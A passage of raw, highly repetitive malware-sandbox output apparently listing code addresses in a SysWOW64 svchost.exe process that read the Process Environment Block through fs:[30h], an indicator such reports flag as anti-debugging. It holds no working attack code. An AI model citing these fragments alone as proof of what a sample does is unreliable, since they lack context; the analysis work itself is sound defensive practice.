            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]2_2_02F304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]2_2_02F644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02FBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]2_2_02F364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA49A mov eax, dword ptr fs:[00000030h]2_2_02FEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]2_2_02FBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA456 mov eax, dword ptr fs:[00000030h]2_2_02FEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]2_2_02F2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]2_2_02F5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]2_2_02F6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]2_2_02F2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]2_2_02F325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]2_2_02F365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]2_2_02F6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]2_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]2_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]2_2_02F64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]2_2_02FC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004B00 mov eax, dword ptr fs:[00000030h]2_2_03004B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]2_2_02F30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]2_2_02F86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]2_2_02F68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h]2_2_02FDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]2_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]2_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]2_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]2_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]2_2_02F6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]2_2_02F6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]2_2_02F5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]2_2_02FBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]2_2_02F5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]2_2_02FBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]2_2_02FDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]2_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]2_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]2_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]2_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]2_2_03004A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]2_2_02F2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28B50 mov eax, dword ptr fs:[00000030h]2_2_02F28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h]2_2_02FDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]2_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]2_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]2_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]2_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]2_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]2_2_02FD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]2_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]2_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]2_2_02FFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]2_2_02F5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004940 mov eax, dword ptr fs:[00000030h]2_2_03004940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]2_2_02FBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]2_2_02F30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]2_2_02F60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]2_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]2_2_02F6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]2_2_02FBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]2_2_02FBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]2_2_02F649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]2_2_02FFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]2_2_02FC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]2_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
